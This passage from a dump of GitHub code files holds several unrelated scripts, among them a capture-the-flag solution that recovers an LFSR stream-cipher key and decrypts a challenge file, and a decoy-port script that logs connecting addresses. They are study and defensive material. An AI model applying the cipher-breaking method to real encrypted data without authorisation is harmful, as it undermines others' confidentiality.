pt:\r\n\t\tgenbyte = 0\r\n\t\tfor i in range(8):\r\n\t\t\tgenbyte = genbyte << 1\r\n\t\t\tgenbyte += cipher.clock()\r\n\t\tct += long_to_bytes(gf256_multiply(genbyte, byte))\r\n\twith open(outf, 'wb') as f:\r\n\t\tf.write(ct)\r\n\r\ndef decrypt(fn, key):\r\n\tglobal lookup, val\r\n\tcipher = Gen(key, 64)\r\n\tct = b''\r\n\twith open(fn, 'rb') as f:\r\n\t\tct = f.read()\r\n\tpt = b''\r\n\tfor byte in ct:\r\n\t\tgenbyte = 0\r\n\t\tfor i in range(8):\r\n\t\t\tgenbyte = genbyte << 1\r\n\t\t\tgenbyte += cipher.clock()\r\n\t\tpt += long_to_bytes(val[lookup[genbyte]][byte])\r\n\tl = len(pt)\r\n\tcnt = 0\r\n\tfor byte in pt:\r\n\t\tif byte < 128:\r\n\t\t\tcnt += 1\r\n\tprint(key, cnt / l)\r\n\tif cnt / l >= 0.6 or b\"ctf{\" in pt: # high ascii? ctf{ ?\r\n\t\tprint(pt)\r\n\r\nTAPS = [2, 4, 5, 7, 10, 12, 13, 17, 19, 24, 25, 27, 30, 32, \r\n\t\t33, 34, 35, 45, 47, 49, 50, 52, 54, 56, 57, 58, 59, 60, 61, 64]\r\n\r\nR = PolynomialRing(GF(2), 'x')\r\nx = R.gen()\r\n\r\nf = (x ** 64)\r\n\r\nfor t in TAPS:\r\n\tf += (x ** (64 - t))\r\n\r\npoly = f\r\n\r\n\r\nM = [poly.list()[1:]]\r\nfor i in range(63):\r\n\tM.append([1 if j == i else 0 for j in range(64)])\r\n\r\nex = 255\r\n\r\nM = Matrix(GF(2), M)\r\nA = M ** ex \r\ng = (x ** ex) - 1\r\ng = g % f \r\nprint(f.gcd(g))\r\n\r\n\r\nE, S = A.eigenspaces_right(format='galois')[0]\r\nassert E == 1\r\n\r\nbasis = S.basis()\r\n\r\nfor i in tqdm(range(1, 1 << len(basis))):\r\n\tvec = vector(GF(2), [0] * 64)\r\n\tfor j in range(len(basis)):\r\n\t\tif ((i >> j) & 1) == 1:\r\n\t\t\tvec += basis[j]\r\n\tassert A * vec == vec\r\n\ttt = list(vec)[::-1]\r\n\tfor j in range(64):\r\n\t\ttt[j] = int(tt[j])\r\n\tkey = int(''.join([str(d) for d in tt]), 2)\r\n\tdecrypt(\"ct\", key)\r\n","repo_name":"rkm0959/Cryptography_Writeups","sub_path":"2021/corCTF/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"34"} +{"seq_id":"34825324395","text":"import os\nimport time\nimport re\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\ndef parse_input(file: str):\n lines = open(f\"{dir_path}/{file}.txt\", \"r\").read().splitlines()\n limits, tickets, my_ticket = [], [], []\n handle_limit, i = True, 0\n field_pos = {}\n while i < len(lines):\n line = lines[i]\n if line == \"\":\n i += 2\n handle_limit = False\n continue\n if handle_limit:\n limits.append(list(map(int, re.findall(r'(\\d+)', line))))\n field_pos[line.split(\":\")[0]] = []\n elif my_ticket == []:\n my_ticket = list(map(int, line.split(\",\")))\n else:\n tickets.append(list(map(int, line.split(\",\"))))\n i += 1\n return limits, tickets, field_pos, my_ticket\n\n\nlimits, tickets, field_pos, my_ticket = parse_input(\"input\")\n\n\ndef is_valid(n: int, limit: tuple):\n return limit[0] <= n <= limit[1] or limit[2] <= n <= limit[3]\n\n\ndef part_1(limits=limits, tickets=tickets):\n valid_ticket = tickets[:]\n res = 0\n for i, ticket in enumerate(tickets):\n # check every ticket number\n for n in ticket:\n valid_n = False\n for limit in limits:\n if is_valid(n, limit):\n valid_n = True\n break # pass to next n in ticket\n else:\n continue\n if not valid_n:\n res += n\n valid_ticket.remove(ticket)\n break # skip end of ticket\n return res, valid_ticket\n\n\ndef part_2(limits=limits, tickets=tickets, field_pos=field_pos, my_ticket=my_ticket):\n for j, field in enumerate(field_pos):\n limit = limits[j]\n # test ith element\n for i in range(len(field_pos)):\n valid_for_all = True\n for ticket in 
tickets:\n if is_valid(ticket[i], limit):\n continue\n else:\n valid_for_all = False\n break\n if valid_for_all:\n old_pos = field_pos[field]\n old_pos.append(i)\n field_pos[field] = old_pos\n final_pos = find_final_pos(field_pos)\n res = 1\n for field, pos in final_pos.items():\n if field.startswith(\"departure\"):\n res *= my_ticket[pos[0]]\n return res\n\n\ndef find_final_pos(field_pos):\n if all([len(x) == 1 for x in field_pos.values()]):\n return field_pos\n uniques = []\n for p in field_pos.values():\n if len(p) == 1:\n uniques.append(p[0])\n # remove all unique from every list\n for k, p in field_pos.items():\n if len(p) == 1:\n continue\n new = [x for x in p if x not in uniques]\n field_pos[k] = new\n return find_final_pos(field_pos)\n\n\ndef test_demo():\n limits, tickets, field_pos, my_ticket = parse_input(\"demo\")\n assert part_1(limits, tickets)[0] == 71\n\n\nstart = time.time()\nres_1, valid_tickets = part_1()\nprint(\"Part 1:\", res_1, \"/ Part 2:\", part_2(tickets=valid_tickets))\nprint(\"--- %.4f seconds ---\" % (time.time() - start))\n","repo_name":"adrientiburce/adventofcode","sub_path":"2020/day_16/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"70958997539","text":"from typing import Optional\nfrom pprint import pprint\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom pytorch_lightning import LightningModule\nfrom transformers import AdamW, AutoConfig, AutoModel, AutoModelForSequenceClassification, get_linear_schedule_with_warmup\nfrom transformers.modeling_outputs import SequenceClassifierOutput\nfrom torchmetrics import MetricCollection, Recall, Precision, Accuracy, ConfusionMatrix\n\nfrom job_offers_classifier.classification_utils import *\n\nclass FullyConnectedOutput(nn.Module):\n def __init__(self, input_size, output_size, layer_units=(10,), nonlin=nn.ReLU(), hidden_dropout=0, output_nonlin=nn.Softmax(dim=1), criterion=nn.CrossEntropyLoss()):\n super().__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.nonlin = nonlin\n self.layer_units = layer_units\n self.output_nonlin = output_nonlin\n self.criterion = criterion\n self.hidden_dropout = hidden_dropout\n\n sequence = []\n units = [self.input_size] + list(self.layer_units) + [self.output_size]\n for in_size, out_size in zip(units, units[1:]):\n sequence.extend([nn.Linear(in_size, out_size), self.nonlin, nn.Dropout(self.hidden_dropout)])\n\n sequence = sequence[:-2]\n self.sequential = nn.Sequential(*sequence)\n\n def forward(self, batch, labels=None):\n output = self.sequential(batch)\n\n if labels is not None:\n return self.criterion(output, labels), output\n else:\n return self.output_nonlin(output)\n\n\nclass TransformerClassifier(LightningModule):\n def __init__(\n self,\n model_name_or_path: str,\n num_labels: int,\n output_type: str = \"linear\",\n learning_rate: float = 1e-5,\n adam_epsilon: float = 1e-8,\n warmup_steps: float = 50, # from 0-1 for % of training steps, >1 for number of steps\n weight_decay: float = 0.01,\n train_batch_size: int = 32,\n eval_batch_size: int = 32,\n hidden_dropout: float = 0.0,\n eval_top_k: int = 10,\n freeze_transformer: bool = False,\n verbose: bool = True,\n **kwargs,\n ):\n super().__init__()\n\n self.save_hyperparameters()\n\n if self.hparams.verbose:\n print(f\"Initializing TransformerClassifier with model_name={model_name_or_path}, 
output_type={output_type}, num_labels={num_labels}, learning_rate={learning_rate}, weight_decay={weight_decay}, warmup_steps={warmup_steps} ...\")\n\n self.config = AutoConfig.from_pretrained(\n model_name_or_path,\n finetuning_task=None\n )\n self.transformer = AutoModel.from_pretrained(model_name_or_path, config=self.config)\n self.output = self._get_output_layer(output_type, num_labels, hidden_dropout)\n\n metric_dict = {\n \"acc/r@1\": Accuracy(num_classes=num_labels),\n \"macro_acc\": Accuracy(num_classes=num_labels, average='macro'),\n #\"cf_matrix_true\": ConfusionMatrix(num_classes=num_labels, normalize='all'),\n #\"cf_matrix_all\": ConfusionMatrix(num_classes=num_labels, normalize='all')\n }\n\n for i in range(2, min(num_labels, eval_top_k + 1)):\n metric_dict[f\"r@{i}\"] = Recall(num_classes=num_labels, top_k=i)\n\n self.metrics = MetricCollection(metric_dict)\n\n\n def _get_output_layer(self, output_type, output_size, hidden_dropout):\n if output_type == \"linear\":\n return FullyConnectedOutput(self.config.hidden_size, output_size, layer_units=(), hidden_dropout=hidden_dropout, output_nonlin=nn.Softmax(dim=1), criterion=nn.CrossEntropyLoss())\n elif output_type == \"nn\":\n return FullyConnectedOutput(self.config.hidden_size, output_size, layer_units=(self.config.hidden_size,), hidden_dropout=hidden_dropout, output_nonlin=nn.Softmax(dim=1), criterion=nn.CrossEntropyLoss())\n else:\n raise ValueError(\"Unknown output_type for TransformersClassifier\")\n\n def forward(self, batch, labels=None):\n transformer_output = self.transformer(batch['input_ids'], attention_mask=batch['attention_mask'])\n transformer_output = transformer_output.last_hidden_state[:, 0, :]\n if self.output is None:\n return transformer_output\n else:\n return self.output.forward(transformer_output, labels=labels)\n\n def training_step(self, batch, batch_idx):\n if batch['labels'] is not None: # Windows fix\n batch['labels'] = batch['labels'].type(torch.LongTensor)\n batch['labels'] = batch['labels'].to(self.device)\n \n loss, scores = self.forward(batch, batch['labels'])\n self.log('train_loss', loss, on_epoch=True, logger=True)\n return loss\n\n def _eval_step(self, batch, eval_name='val'):\n if batch['labels'] is not None: # Windows fix\n batch['labels'] = batch['labels'].type(torch.LongTensor)\n batch['labels'] = batch['labels'].to(self.device)\n \n loss, scores = self.forward(batch, batch['labels'])\n self.log(f'{eval_name}_performance', self.metrics(scores, batch['labels']), on_epoch=True, logger=True)\n self.log(f'{eval_name}_loss', loss, on_epoch=True, logger=True)\n return loss\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n return self._eval_step(batch, eval_name='val')\n\n def validation_epoch_end(self, outputs):\n if self.hparams.verbose:\n print(\"Validation performance:\")\n pprint(self.metrics.compute())\n self.metrics.reset()\n\n def test_step(self, batch, batch_idx, dataloader_idx=0):\n return self._eval_step(batch, eval_name='test')\n\n def test_epoch_end(self, outputs):\n if self.hparams.verbose:\n print(\"Test performance:\")\n pprint(self.metrics.compute())\n\n def setup(self, stage=None) -> None:\n if stage != \"fit\":\n return\n\n # Get dataloader by calling it - train_dataloader() is called after setup() by default\n train_loader = self.trainer.datamodule.train_dataloader()\n\n # Calculate total steps\n tb_size = self.hparams.train_batch_size * max(1, self.trainer.gpus)\n ab_size = self.trainer.accumulate_grad_batches\n dl_size = len(train_loader.dataset) * 
self.trainer.max_epochs\n self.total_steps = dl_size // tb_size // ab_size\n\n self.num_warmup_steps = self.hparams.warmup_steps\n if self.hparams.warmup_steps < 1:\n self.num_warmup_steps = int(self.total_steps * self.hparams.warmup_steps)\n\n if self.hparams.verbose:\n print(\"Warmup_steps:\", self.num_warmup_steps)\n print(\"Total steps:\", self.total_steps)\n\n def configure_optimizers(self):\n # Prepare optimizer and schedule (linear warmup and decay)\n optimizer = AdamW(self._get_optimizer_grouped_parameters(),\n lr=self.hparams.learning_rate,\n eps=self.hparams.adam_epsilon)\n\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=self.num_warmup_steps,\n num_training_steps=self.total_steps,\n )\n scheduler = {\"scheduler\": scheduler, \"interval\": \"step\", \"frequency\": 1}\n return [optimizer], [scheduler]\n\n def save_transformer(self, ckpt_dir):\n self.transformer.save_pretrained(ckpt_dir)\n\n def _get_optimizer_grouped_parameters(self, layer_wise_lr=False, layer_wise_lr_mutli=1.1):\n # It is suggested to not use any decay for bias, LayerNorm.weight and LayerNorm.weight layers.\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n\n if layer_wise_lr:\n optimizer_grouped_parameters = []\n for name, params in self.named_parameters():\n weight_decay = 0.0 if any(nd in name for nd in no_decay) else self.hparams.weight_decay\n learning_rate = self.hparams.learning_rate\n\n if 'embeddings' in name or 'encoder' in name:\n learning_rate /= 10\n\n for i in range(0, 20):\n if f'layer.{i}' in name:\n learning_rate *= layer_wise_lr_mutli ** (i + 1)\n\n print(name, learning_rate)\n optimizer_grouped_parameters.append({\n \"params\": params,\n \"weight_decay\": weight_decay,\n \"lr\": learning_rate\n })\n\n else:\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in self.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": self.hparams.weight_decay,\n },\n {\n \"params\": [p for n, p in self.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n\n return optimizer_grouped_parameters\n","repo_name":"ONLABSPL/job-ads-classifier","sub_path":"job_offers_classifier/transformer_module.py","file_name":"transformer_module.py","file_ext":"py","file_size_in_byte":9049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39456396199","text":"#!/usr/bin/env python\n# encoding=utf-8\n# maintainer: rgaudin\n\nimport sys\n\nfrom PyQt4 import QtGui, QtCore\n\nfrom database import Account\nfrom data_helpers import period_has_budgets, \\\n current_period, create_empty_budgets\nfrom menubar import MenuBar\nfrom balanceview import BalanceViewWidget\nfrom operationview import OperationWidget\n\n\nclass MainWindow(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n\n self.resize(900, 650)\n self.setWindowTitle(_(u\"AN Budgets Manager\"))\n self.setWindowIcon(QtGui.QIcon('images/icon32.png'))\n\n self._account = None\n\n self.menubar = MenuBar(self)\n self.setMenuBar(self.menubar)\n\n if not period_has_budgets(current_period()):\n from balanceupdateview import BalanceUpdateWidget\n create_empty_budgets(current_period())\n self.change_context(BalanceUpdateWidget, force_current=True)\n else:\n self.change_context(BalanceViewWidget)\n\n def getaccount(self):\n return self._account\n\n def setaccount(self, value):\n if not isinstance(value, (Account, None.__class__)):\n raise ValueError(_(u\"account must be an Account or None.\"))\n 
self._account = value\n\n    def clear_account(self):\n        self.account = None\n\n    account = property(getaccount, setaccount)\n\n    def change_context(self, context_widget, *args, **kwargs):\n        # remove account before switching\n        self.clear_account()\n\n        # instantiate context\n        self.view_widget = context_widget(parent=self, *args, **kwargs)\n\n        # refresh menubar\n        self.menubar.refresh()\n\n        # attach context to window\n        self.setCentralWidget(self.view_widget)\n\n    def open_dialog(self, dialog, modal=False, *args, **kwargs):\n        d = dialog(parent=self, *args, **kwargs)\n        d.setModal(modal)\n        d.exec_()\n","repo_name":"yeleman/anm","sub_path":"anm/ui/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"20229301088","text":"import unittest\nimport numpy as np\nfrom Enterprise.service.feature_extraction import FeatureExtraction\nfrom Enterprise.service.key_words import KeyWords\n\n\nclass TestTopic(unittest.TestCase):\n    def test_lda(self):\n        # Chinese fixture documents are kept verbatim: the expected keywords below depend on them\n        file_list = ['新春 备 年货 , 新年 联欢晚会',\n                     '新春 节目单 , 春节 联欢晚会 红火',\n                     '大盘 下跌 股市 散户',\n                     '下跌 股市 赚钱',\n                     '金猴 新春 红火 新年',\n                     '新车 新年 年货 新春',\n                     '股市 反弹 下跌',\n                     '股市 散户 赚钱',\n                     '新年 , 看 春节 联欢晚会',\n                     '大盘 下跌 散户 散户']\n        word, weight = FeatureExtraction.feature_extraction(file_list)\n        print(\"Feature terms:\\n\", np.asarray(word))\n        print(\"Feature vectors:\\n\", np.asarray(weight))\n        doc_keywords = []\n        KeyWords.cal_doc_keywords(weight, word, doc_keywords)\n        print(\"Document keywords:\\n\", np.asarray(doc_keywords))\n\n        self.assertEqual(doc_keywords,\n                         [['年货', '联欢晚会'], ['节目单', '红火'], ['大盘', '散户'], ['赚钱'], ['金猴', '红火'], ['新车', '年货'], ['反弹'],\n                          ['赚钱'], ['春节'], ['散户']])\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"161250020/GraduationPro","sub_path":"Test/Enterprise/test_key_words.py","file_name":"test_key_words.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9911884143","text":"class Solution:\n    def findComplement(self, num: int) -> int:\n        s = bin(num).replace('0b', '')\n        t = ''\n        for i in s:\n            if i == '0':\n                t += '1'\n            else:\n                t += '0'\n        return int(t, 2)\n","repo_name":"Nosewall/Leetcode-Hobby-Dream-Machine","sub_path":"476. 
Number complement/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"15534847589","text":"\n# Menu tree\nmenu_tree = {1: \"ekstrudiranje\",\n 11: \"ZSK43\",\n 110: \"ekstrudiranje\",\n 111: \"čišćenje\",\n 112: \"čišćenje radnog mesta\",\n 113: \"čekanje probe sa mlina\",\n 114: \"kontrola\",\n 115: \"kvar\",\n 116: \"nema premiksa\",\n 1160: \"korekcija\",\n 1161: \"nema premiksa\",\n 1162: \"nema sirovine\",\n 117: \"nema konejnera za čips\",\n 118: \"zagrevanje\",\n 119: \"nema operatera\",\n 12: \"APV\",\n 120: \"ekstrudiranje\",\n 121: \"čišćenje\",\n 122: \"čišćenje radnog mesta\",\n 123: \"čekanje probe sa mlina\",\n 124: \"kontrola\",\n 125: \"kvar\",\n 126: \"nema premiksa\",\n 1260: \"korekcija\",\n 1261: \"nema premiksa\",\n 1262: \"nema sirovine\",\n 127: \"nema konejnera za čips\",\n 128: \"zagrevanje\",\n 129: \"nema operatera\",\n 2: \"mlevenje\",\n 21: \"ACM20\",\n 210: \"mlevenje\",\n 211: \"čišćenje\",\n 212: \"čišćenje radnog mesta\",\n 213: \"kontrola\",\n 214: \"kvar\",\n 215: \"nema čipsa\",\n 216: \"pražnjenje filtera\",\n 217: \"nema operatera\",\n 22: \"ACM30\",\n 220: \"mlevenje\",\n 221: \"čišćenje\",\n 222: \"čišćenje radnog mesta\",\n 223: \"kontrola\",\n 224: \"kvar\",\n 225: \"nema čipsa\",\n 226: \"pražnjenje filtera\",\n 227: \"nema operatera\",\n 3: \"šaržiranje\",\n 30: \"ubacivanje premiksa\",\n 31: \"mešanje premiksa\"\n }\n\n# breakdown_tree\nbreakdown_tree = {\"E1\": \"stanica za istakanje\",\n \"E11\": \"pneumatika\",\n \"E111\": \"creva\",\n \"E112\": \"spojnice\",\n \"E112\": \"elektroormar\",\n \"E12\": \"ručica za otvaranje kontejnera\",\n \"E121\": \"ručica na stanici za istakanje\",\n \"E122\": \"ručica na kontejneru\",\n \"E13\": \"tresač\",\n \"E131\": \"vibromotor\",\n \"E132\": \"elektroormar\",\n \"E14\": \"cev\",\n \"E141\": \"zaptivna guma\",\n \"E2\": \"dozirni koš\",\n \"E21\": \"motor\",\n \"E22\": \"spirala\",\n \"E23\": \"mehanizam\",\n \"E3\": \"pogonski mehanizam\",\n \"E31\": \"motor za šneke\",\n \"E32\": \"reduktor\",\n \"E33\": \"spojnica\",\n \"E34\": \"šneke\",\n \"E341\": \"zamena šnjura\",\n \"E342\": \"zakovale šneke\",\n \"E343\": \"stale šneke - viskoa T u el ormaru na APVu??\",\n \"E4\": \"temperaturne zone\",\n \"E41\": \"zagrevanje zona\",\n \"E411\": \"grejač\",\n \"E42\": \"hlađenje zona\",\n \"E421\": \"elektromagnetni ventil\",\n \"E422\": \"crevo za rashladnu vodu\",\n \"E423\": \"agregat sa destilovanom vodom\",\n \"E5\": \"rashladna traka\",\n\n \"E9\": \"Ostalo\",\n \"E91\": \"lift\",\n \"E92\": \"nestanak struje\",\n \"E93\": \"ventilacija\",\n \"E94\": \"komprimovani vazduh\",\n \"E95\": \"Mešač\",\n \"E96\": \"kontrolna tabla\",\n \"M1\": \"doziranje čipsa\",\n \"M2\": \"doziranje aditiva\",\n \"M3\": \"mlin\",\n \"M4\": \"ciklon\",\n \"M5\": \"filter\",\n \"M6\": \"separator\",\n \"M7\": \"istakanje\",\n \"M8\": \"ventilator\",\n \"M9\": \"ostalo\",\n \"M91\": \"rashladni uređaj za ulazni vazduh\",\n \"M92\": \"nestanak struje\",\n \"M93\": \"ventilacija\",\n \"M94\": \"dizalica\",\n \"M95\": \"senzor\"\n\n}\n","repo_name":"miiihaaas/OEE","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"497973550","text":"import subprocess\nimport random\nimport os\nimport asyncio\nimport json\nfrom datetime import datetime\nimport 
logging\n\n\nclass PortManager:\n def __init__(self, ports, stealth_port_path):\n self.ports = ports\n self.stealth_port_path = stealth_port_path\n\n async def spawn_stealth_port(self, port):\n while True:\n logging.info(f'[stealth] => START on {port}/tcp')\n try:\n proc = await asyncio.create_subprocess_exec(self.stealth_port_path, str(port), **subprocess_args())\n stdout, stderr = await proc.communicate()\n line = stdout.decode('ascii').rstrip()\n logging.info(f'[stealth] => {line}')\n parsed_line = json.loads(line)\n if parsed_line[\"returntype\"] == 'con':\n log_line = f'{datetime.now()}\\t{parsed_line[\"ip\"]}\\t{parsed_line[\"port\"]}\\n'\n with open('C:\\\\chaff\\\\chaff.log', 'a+') as f:\n f.write(log_line)\n f.flush()\n\n except Exception as e:\n logging.error(f'[stealth] =!> except: {e}')\n\n await asyncio.sleep(60)\n\n async def spawn_normal_port(self, port):\n try:\n logging.info(f'[normal] => START on {port}/tcp')\n await asyncio.start_server(cb_send_msg, '0.0.0.0', port)\n\n except Exception as e:\n logging.error(f'[normal] =!> except: {e}')\n\n def start(self):\n random.shuffle(self.ports)\n\n loop = asyncio.ProactorEventLoop()\n asyncio.set_event_loop(loop)\n tasks = [\n asyncio.ensure_future(self.spawn_stealth_port(self.ports[0])),\n asyncio.ensure_future(self.spawn_normal_port(self.ports[1])),\n ]\n\n loop.run_until_complete(asyncio.gather(*tasks))\n loop.close()\n\n\nasync def cb_send_msg(_reader, writer):\n _sock_bind_addr, sock_port = writer.get_extra_info('sockname')\n sock_peer_addr, _sock_peer_port = writer.get_extra_info('peername')\n print(f'[normal] => {sock_peer_addr} | {sock_port}')\n\n try:\n log_line = f'{datetime.now()}\\t{sock_peer_addr}\\t{sock_port}\\n'\n with open('C:\\\\chaff\\\\chaff.log', 'a+') as f:\n f.write(log_line)\n f.flush()\n writer.write(b'nice, my dude')\n await writer.drain()\n writer.close()\n except ConnectionResetError:\n logging.info(f'[normal] => ECONNRESET')\n except OSError as e:\n logging.info(f'[normal] =!> OSError: {e}')\n except Exception as e:\n logging.error(f'ERROR: {e}')\n\n\ndef subprocess_args(include_stdout=True):\n # The following is true only on Windows.\n if hasattr(subprocess, 'STARTUPINFO'):\n\n si = subprocess.STARTUPINFO()\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n\n env = os.environ\n else:\n si = None\n env = None\n\n if include_stdout:\n ret = {'stdout': subprocess.PIPE}\n else:\n ret = {}\n\n ret.update({'stdin': subprocess.PIPE,\n 'stderr': subprocess.PIPE,\n 'startupinfo': si,\n 'env': env})\n return ret\n\n\ndef main():\n logging.basicConfig(filename='C:\\\\chaff\\\\operational.log', level=logging.INFO)\n logging.info(\"STARTUP\")\n ports = [21, 22, 23, 80, 443, 8000, 8080, 25, 110, 53, 3306, 5900, 69]\n pm = PortManager(\n ports,\n 'C:\\\\chaff\\\\port.exe')\n pm.start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"loftwing/chaff","sub_path":"chaff.py","file_name":"chaff.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"24831907275","text":"import pytest\n\nfrom bioreactor_client.process_state_machine import AbortProcess\nfrom bioreactor_client.safety_monitor import SafetyMonitor\n\n\ndef test_over_temperature(mock_reactor):\n\n safety_monitor = SafetyMonitor(max_pressure=200, max_temperature=100)\n\n # Sanity check that we don't raise when under max temperature\n mock_reactor.get_reactor_status()['temperature'] = 90\n 
safety_monitor.monitor_reactor_parameters(mock_reactor.get_reactor_status())\n\n    # Check that we catch an over-temperature condition\n    mock_reactor.get_reactor_status()['temperature'] = 110\n    with pytest.raises(AbortProcess):\n        safety_monitor.monitor_reactor_parameters(mock_reactor.get_reactor_status())\n","repo_name":"pbaughman/bioreactor_client","sub_path":"tests/test_safety_monitor.py","file_name":"test_safety_monitor.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3167279378","text":"import requests\nimport time\nimport json\n\nTASK_PATH = \"/Users/user/Desktop/DataSciencePython/\"\nJOB_COUNT = 10\n\ntasks = {\n}\n\nwith open(TASK_PATH+\"logistic_regression_updated.py\") as pythonApp, open(TASK_PATH+\"requirements.txt\") as requirements:\n    file_dict = {\"program\": pythonApp, \"requirements\": requirements}\n\n    for _ in range(0, JOB_COUNT):\n        response = requests.post(\"http://192.168.101.66:5000/routine\", files=file_dict).json()\n        print(\"Task id:\", response)\n        tasks[response[\"id\"]] = \"\"\n\nprint(\"Tasks: \", tasks)\nperformance = {}\n\nwhile tasks:\n    response = requests.get(\"http://192.168.101.66:5000/mongo/taskstatus\", params={\"id\": list(tasks.keys())}).json()\n    print(response)\n    for task in response:\n        print(\"Checking task %s\" % task[\"id\"])\n        if task[\"status\"] == \"FAILURE\":\n            print(\"Task %s failed\" % task[\"id\"])\n            del tasks[task[\"id\"]]\n        elif task[\"status\"] == \"SUCCESS\":\n            print(\"Task %s finished successfully\" % task[\"id\"])\n            del tasks[task[\"id\"]]\n\n            performanceResp = requests.get(\"http://192.168.101.66:5000/mongo/taskperformance\", params={\"id\": task[\"id\"]}).json()\n            print(performanceResp)\n            performance[task[\"id\"]] = performanceResp\n\n    time.sleep(1)\n\nwith open(\"output.json\", \"w\") as outputFile:\n    json.dump(performance, outputFile)\n","repo_name":"gcd-cloud-research/KAQoS","sub_path":"test-routines/joblauncher.py","file_name":"joblauncher.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26555745221","text":"import fixtures\nimport os\nimport signal\nimport time\nimport traceback\n\nfrom nova.openstack.common import log as logging\nfrom nova import service\nfrom nova.tests.integrated import integrated_helpers\n\nLOG = logging.getLogger(__name__)\n\n\nclass MultiprocessWSGITest(integrated_helpers._IntegratedTestBase):\n    def _start_api_service(self):\n        # Process will be started in _spawn()\n        self.osapi = service.WSGIService(\"osapi_compute\")\n        self.auth_url = 'http://%s:%s/v2' % (self.osapi.host, self.osapi.port)\n        LOG.info('auth_url = %s' % self.auth_url)\n\n    def _get_flags(self):\n        self.workers = 2\n        f = super(MultiprocessWSGITest, self)._get_flags()\n        f['osapi_compute_workers'] = self.workers\n        return f\n\n    def _spawn(self):\n        pid = os.fork()\n        if pid == 0:\n            # NOTE(johannes): We can't let the child processes exit back\n            # into the unit test framework since then we'll have multiple\n            # processes running the same tests (and possibly forking more\n            # processes that end up in the same situation). So we need\n            # to catch all exceptions and make sure nothing leaks out, in\n            # particular SystemExit, which is raised by sys.exit(). 
We use\n # os._exit() which doesn't have this problem.\n status = 0\n try:\n launcher = service.ProcessLauncher()\n launcher.launch_server(self.osapi, workers=self.osapi.workers)\n launcher.wait()\n except SystemExit as exc:\n status = exc.code\n except BaseException:\n # We need to be defensive here too\n try:\n traceback.print_exc()\n except BaseException:\n LOG.error(\"Couldn't print traceback\")\n status = 2\n\n # Really exit\n os._exit(status)\n\n self.pid = pid\n\n # Wait at most 10 seconds to spawn workers\n cond = lambda: self.workers == len(self._get_workers())\n timeout = 10\n self._wait(cond, timeout)\n\n workers = self._get_workers()\n self.assertEqual(len(workers), self.workers)\n return workers\n\n def _wait(self, cond, timeout):\n start = time.time()\n while True:\n if cond():\n break\n if time.time() - start > timeout:\n break\n time.sleep(.1)\n\n def tearDown(self):\n if self.pid:\n # Make sure all processes are stopped\n os.kill(self.pid, signal.SIGTERM)\n\n try:\n # Make sure we reap our test process\n self._reap_test()\n except fixtures.TimeoutException:\n # If the child gets stuck or is too slow in existing\n # after receiving the SIGTERM, gracefully handle the\n # timeout exception and try harder to kill it. We need\n # to do this otherwise the child process can hold up\n # the test run\n os.kill(self.pid, signal.SIGKILL)\n\n super(MultiprocessWSGITest, self).tearDown()\n\n def _reap_test(self):\n pid, status = os.waitpid(self.pid, 0)\n self.pid = None\n return status\n\n def _get_workers(self):\n f = os.popen('ps ax -o pid,ppid,command')\n # Skip ps header\n f.readline()\n\n processes = [tuple(int(p) for p in l.strip().split()[:2])\n for l in f.readlines()]\n return [p for p, pp in processes if pp == self.pid]\n\n def test_killed_worker_recover(self):\n start_workers = self._spawn()\n\n # kill one worker and check if new worker can come up\n LOG.info('pid of first child is %s' % start_workers[0])\n os.kill(start_workers[0], signal.SIGTERM)\n\n # Wait at most 5 seconds to respawn a worker\n cond = lambda: start_workers != self._get_workers()\n timeout = 5\n self._wait(cond, timeout)\n\n # Make sure worker pids don't match\n end_workers = self._get_workers()\n LOG.info('workers: %r' % end_workers)\n self.assertNotEqual(start_workers, end_workers)\n\n # check if api service still works\n flavors = self.api.get_flavors()\n self.assertTrue(len(flavors) > 0, 'Num of flavors > 0.')\n\n def _terminate_with_signal(self, sig):\n self._spawn()\n\n # check if api service is working\n flavors = self.api.get_flavors()\n self.assertTrue(len(flavors) > 0, 'Num of flavors > 0.')\n\n os.kill(self.pid, sig)\n\n # Wait at most 5 seconds to kill all workers\n cond = lambda: not self._get_workers()\n timeout = 5\n self._wait(cond, timeout)\n\n workers = self._get_workers()\n LOG.info('workers: %r' % workers)\n 